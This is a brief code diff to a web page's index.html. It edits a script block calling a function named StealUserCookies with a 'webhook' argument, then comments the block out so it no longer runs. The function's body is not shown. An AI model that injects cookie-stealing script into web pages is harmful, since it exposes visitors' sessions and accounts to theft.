--- a/index.html
+++ b/index.html
@@ -27,11 +27,11 @@
       <source id="media" type="audio/mp3">
     </audio>
 
+    <!--
     <script>
-
-      StealUserCookies("webhook.html");
-
+      StealUserCookies("webhook");
     </script>
+    -->
 
     <div id="center" class="center">
       <div class="proof">
